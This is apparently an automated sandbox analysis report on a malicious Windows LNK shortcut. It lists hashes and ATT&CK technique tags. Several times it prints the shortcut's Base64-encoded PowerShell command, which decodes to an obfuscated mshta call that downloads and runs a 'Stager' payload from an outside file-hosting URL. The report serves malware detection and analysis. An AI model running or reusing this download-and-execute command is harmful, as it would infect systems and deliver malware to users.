Malicious
Malicious

0906e26681d7866715a52648581d03bd

LNK File
|
MD5: 0906e26681d7866715a52648581d03bd
|
Size: 2.38 KB
|
application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
0906e26681d7866715a52648581d03bd
Sha1
c2f5371932deca1e5b939f8dba109884da2c7131
Sha256
de36a43adddc063311313a12aa800d63af9df0e5e7379c1a2b16aee92d4e5c66
Sha384
983f349d2c21295838eaca64ab379c21f141faef9fc3b0d2e8413b89577d64e1e06cc031c85ac81baef71e70add8279b
Sha512
146a72d44cd3c1f26cdf5cf2499703c6d59e414032bbaafabdaf882bda4d05f7585bbe4b10c9126f5f99db9854b01d58b11d8f679016619db881e25948fd42f3
SSDeep
48:8r5aqzfSwuolMol3a/aklkQVh6FtmA4a:8r5vPa/vKQVMeA4
TLSH
1841642809F611FEF93787B99BF873F34562F7E28C285ABC108067424366050B4A3E79
File Structure
0906e26681d7866715a52648581d03bd
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAF4AXgBtAF4AXgBeAHMAaABeAF4AdABhACAAaABeAF4AdAB0AHAAXgBeAHMAXgBeADoAXgBeAF4ALwBeAF4AXgBeAC8AYwBvAGwAXgBkAF4ALQBlAHUALQBeAF4AXgBeAGEAXgBnAF4AXgBsAC0AXgBeAF4AMQBeAF4AXgBeAC4AXgBeAF4AZwBeAF4AXgBeAG8AZgBeAF4AXgBpAF4AXgBsAGUAXgBeAC4AXgBeAF4AXgBpAF4AXgBeAG8AXgBeAC8AXgBeAF4AXgBkAF4AbwB3AG4AXgBeAF4AbABvAF4AXgBeAGEAZAAvAF4AZABeAF4AaQByAGUAYwBeAF4AXgBeAHQALwBeADgAXgA4ADQANwBeAF4AXgBjADEANABeAF4AMwBeAF4AXgAtAF4AYwBeAF4AXgAwAF4AXgBhAF4AXgBeAF4AMQAtADQAXgA1AF4AXgBeAGQAMAAtADgAXgBkAF4AZQAzAF4AXgBeAC0AZQBeAF4AXgBeAGYAMQBeAF4AXgBeAGIAOAA5ADcAXgBeADcAOQAyAGUAZQAvAF4AXgBTAF4AXgB0AGEAXgBeAGcAZQBeAF4AXgByAC4AbQBeAHAAXgA0ACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA==
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAF4AXgBtAF4AXgBeAHMAaABeAF4AdABhACAAaABeAF4AdAB0AHAAXgBeAHMAXgBeADoAXgBeAF4ALwBeAF4AXgBeAC8AYwBvAGwAXgBkAF4ALQBlAHUALQBeAF4AXgBeAGEAXgBnAF4AXgBsAC0AXgBeAF4AMQBeAF4AXgBeAC4AXgBeAF4AZwBeAF4AXgBeAG8AZgBeAF4AXgBpAF4AXgBsAGUAXgBeAC4AXgBeAF4AXgBpAF4AXgBeAG8AXgBeAC8AXgBeAF4AXgBkAF4AbwB3AG4AXgBeAF4AbABvAF4AXgBeAGEAZAAvAF4AZABeAF4AaQByAGUAYwBeAF4AXgBeAHQALwBeADgAXgA4ADQANwBeAF4AXgBjADEANABeAF4AMwBeAF4AXgAtAF4AYwBeAF4AXgAwAF4AXgBhAF4AXgBeAF4AMQAtADQAXgA1AF4AXgBeAGQAMAAtADgAXgBkAF4AZQAzAF4AXgBeAC0AZQBeAF4AXgBeAGYAMQBeAF4AXgBeAGIAOAA5ADcAXgBeADcAOQAyAGUAZQAvAF4AXgBTAF4AXgB0AGEAXgBeAGcAZQBeAF4AXgByAC4AbQBeAHAAXgA0ACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA=="
0906e26681d7866715a52648581d03bd (2.38 KB)
File Structure
0906e26681d7866715a52648581d03bd
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAF4AXgBtAF4AXgBeAHMAaABeAF4AdABhACAAaABeAF4AdAB0AHAAXgBeAHMAXgBeADoAXgBeAF4ALwBeAF4AXgBeAC8AYwBvAGwAXgBkAF4ALQBlAHUALQBeAF4AXgBeAGEAXgBnAF4AXgBsAC0AXgBeAF4AMQBeAF4AXgBeAC4AXgBeAF4AZwBeAF4AXgBeAG8AZgBeAF4AXgBpAF4AXgBsAGUAXgBeAC4AXgBeAF4AXgBpAF4AXgBeAG8AXgBeAC8AXgBeAF4AXgBkAF4AbwB3AG4AXgBeAF4AbABvAF4AXgBeAGEAZAAvAF4AZABeAF4AaQByAGUAYwBeAF4AXgBeAHQALwBeADgAXgA4ADQANwBeAF4AXgBjADEANABeAF4AMwBeAF4AXgAtAF4AYwBeAF4AXgAwAF4AXgBhAF4AXgBeAF4AMQAtADQAXgA1AF4AXgBeAGQAMAAtADgAXgBkAF4AZQAzAF4AXgBeAC0AZQBeAF4AXgBeAGYAMQBeAF4AXgBeAGIAOAA5ADcAXgBeADcAOQAyAGUAZQAvAF4AXgBTAF4AXgB0AGEAXgBeAGcAZQBeAF4AXgByAC4AbQBeAHAAXgA0ACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA==

Malicious

0906e26681d7866715a52648581d03bd
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAF4AXgBtAF4AXgBeAHMAaABeAF4AdABhACAAaABeAF4AdAB0AHAAXgBeAHMAXgBeADoAXgBeAF4ALwBeAF4AXgBeAC8AYwBvAGwAXgBkAF4ALQBlAHUALQBeAF4AXgBeAGEAXgBnAF4AXgBsAC0AXgBeAF4AMQBeAF4AXgBeAC4AXgBeAF4AZwBeAF4AXgBeAG8AZgBeAF4AXgBpAF4AXgBsAGUAXgBeAC4AXgBeAF4AXgBpAF4AXgBeAG8AXgBeAC8AXgBeAF4AXgBkAF4AbwB3AG4AXgBeAF4AbABvAF4AXgBeAGEAZAAvAF4AZABeAF4AaQByAGUAYwBeAF4AXgBeAHQALwBeADgAXgA4ADQANwBeAF4AXgBjADEANABeAF4AMwBeAF4AXgAtAF4AYwBeAF4AXgAwAF4AXgBhAF4AXgBeAF4AMQAtADQAXgA1AF4AXgBeAGQAMAAtADgAXgBkAF4AZQAzAF4AXgBeAC0AZQBeAF4AXgBeAGYAMQBeAF4AXgBeAGIAOAA5ADcAXgBeADcAOQAyAGUAZQAvAF4AXgBTAF4AXgB0AGEAXgBeAGcAZQBeAF4AXgByAC4AbQBeAHAAXgA0ACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA=="

Malicious

0906e26681d7866715a52648581d03bd > LNK CommandLine > [PowerShell Command]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙